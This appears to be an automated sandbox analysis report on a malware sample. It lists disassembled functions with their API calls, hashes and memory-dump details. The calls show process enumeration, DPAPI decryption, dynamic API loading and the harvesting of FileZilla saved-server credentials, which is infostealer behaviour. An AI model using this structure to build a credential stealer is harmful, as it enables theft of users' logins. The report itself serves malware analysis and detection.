                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 3657800372-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                  Function 02F19867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F19885
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 02F19899
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 02F198AE
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 02F198C3
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 02F198E1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 48ce868b5e382b307159e401e41db72caeb938186b535aaf7cbd78123fa992ff
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: 0A014C79A40208FFCB20DFE4CC54BEDB7F9EB08350F404189A505A6240D7B49A44CF91
                                                  Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                  Function 02F19107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,02F053EB,40000001,00000000,00000000,?,02F053EB), ref: 02F19127
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: f4f1d6175a0ed388f3de1682ad2e5bc99e088a82e486cbfad560a411dcc3bd8d
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: A4111F75604204BFEB00CF94DC98FA733AAAF89794F409558FA099B250D7B5E881DBA0
                                                  Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                  Function 02F09D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D56
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,02F05155,00000000,?), ref: 02F09D68
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D91
                                                  • LocalFree.KERNEL32(?,?,?,?,02F05155,00000000,?), ref: 02F09DA6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID:
                                                  • API String ID: 4291131564-0
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: a13a9ebdb8c8ede923b372235047adf60feb4219f6878d11dd2c1d6130a635c1
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 89119474641208EFEB10CF94C895BAA77A5EB49704F208058FE159B390C7B6A901CB90
                                                  Function 02F09DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02F09DEB
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 02F09E0A
                                                  • memcpy.MSVCRT(?,?,?), ref: 02F09E2D
                                                  • LocalFree.KERNEL32(?), ref: 02F09E3A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: d0800abff6e7a4abfdc1f1c7c2eca6d658118a09426f00c7b61f6d5866666090
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 4C110CB8A00209EFDB04CFA4DA89AAE77B5FF89704F108558F91597390D770AE10CF61
                                                  Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                  Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                  • wsprintfA.USER32 ref: 00417AB7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 362916592-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                  Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID:
                                                  • API String ID: 123533781-0
                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                  Function 02F1D1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction ID: eb41b3d3e01398cc11cf0492c21b873dccf3bce470a5e4f17b1a3ff5bcade897
                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction Fuzzy Hash: 1471D431452F40EBD7633B31DD01E4A7AA37F24782F904924A3DB29D70DE226869EF51
                                                  Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • strtok_s.MSVCRT ref: 0041031B
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                  • strtok_s.MSVCRT ref: 00410679
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                  • memset.MSVCRT ref: 004106DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                  • API String ID: 337689325-514892060
                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                  Function 02F04827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(00424DA0), ref: 02F04833
                                                  • lstrlen.KERNEL32(00424E50), ref: 02F0483E
                                                  • lstrlen.KERNEL32(00424F18), ref: 02F04849
                                                  • lstrlen.KERNEL32(00424FD0), ref: 02F04854
                                                  • lstrlen.KERNEL32(00425078), ref: 02F0485F
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F0486E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F04875
                                                  • lstrlen.KERNEL32(00425120), ref: 02F04883
                                                  • lstrlen.KERNEL32(004251C8), ref: 02F0488E
                                                  • lstrlen.KERNEL32(00425270), ref: 02F04899
                                                  • lstrlen.KERNEL32(00425318), ref: 02F048A4
                                                  • lstrlen.KERNEL32(?), ref: 02F048AF
                                                  • lstrlen.KERNEL32(00425468), ref: 02F048C3
                                                  • lstrlen.KERNEL32(00425510), ref: 02F048CE
                                                  • lstrlen.KERNEL32(004255B8), ref: 02F048D9
                                                  • lstrlen.KERNEL32(00425660), ref: 02F048E4
                                                  • lstrlen.KERNEL32(00425708), ref: 02F048EF
                                                  • lstrlen.KERNEL32(004257B0), ref: 02F04918
                                                  • lstrlen.KERNEL32(00425858), ref: 02F04923
                                                  • lstrlen.KERNEL32(00425920), ref: 02F0492E
                                                  • lstrlen.KERNEL32(004259C8), ref: 02F04939
                                                  • lstrlen.KERNEL32(00425A70), ref: 02F04944
                                                  • strlen.MSVCRT ref: 02F04957
                                                  • lstrlen.KERNEL32(00425B18), ref: 02F0497F
                                                  • lstrlen.KERNEL32(00425BC0), ref: 02F0498A
                                                  • lstrlen.KERNEL32(00425C68), ref: 02F04995
                                                  • lstrlen.KERNEL32(00425D10), ref: 02F049A0
                                                  • lstrlen.KERNEL32(00425DB8), ref: 02F049AB
                                                  • lstrlen.KERNEL32(00425E60), ref: 02F049BB
                                                  • lstrlen.KERNEL32(00425F08), ref: 02F049C6
                                                  • lstrlen.KERNEL32(00425FB0), ref: 02F049D1
                                                  • lstrlen.KERNEL32(00426058), ref: 02F049DC
                                                  • lstrlen.KERNEL32(00426100), ref: 02F049E7
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02F04A03
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID:
                                                  • API String ID: 2127927946-0
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: a3778dcac760c55b59ea42512594c0fb069f6bfdbb2bd07da4b1ee319edcb335
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 7441BA79740624EBC718AFE5FC8DB987F71AB4C712BA0C062FA0295190CBB5D5119B3D
                                                  Function 02F19AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02F19B08
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02F19B21
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02F19B39
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02F19B51
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02F19B6A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02F19B82
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02F19B9A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02F19BB3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02F19BCB
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02F19BE3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02F19BFC
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02F19C14
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02F19C2C
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02F19C45
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02F19C5D
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02F19C75
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02F19C8E
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02F19CA6
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02F19CBE
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02F19CD7
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02F19CEF
                                                  • LoadLibraryA.KERNEL32(0064A550,?,02F16C67), ref: 02F19D01
                                                  • LoadLibraryA.KERNEL32(0064A17C,?,02F16C67), ref: 02F19D12
                                                  • LoadLibraryA.KERNEL32(0064A104,?,02F16C67), ref: 02F19D24
                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,02F16C67), ref: 02F19D36
                                                  • LoadLibraryA.KERNEL32(0064A328,?,02F16C67), ref: 02F19D47
                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02F19D69
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02F19D8A
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02F19DA2
                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02F19DC4
                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02F19DE5
                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02F19E06
                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02F19E1D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID:
                                                  • API String ID: 2238633743-0
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: b72d1b3e3df0bfec9a00734b8f096189ebefe5d0a4d48d522bb88827a677677b
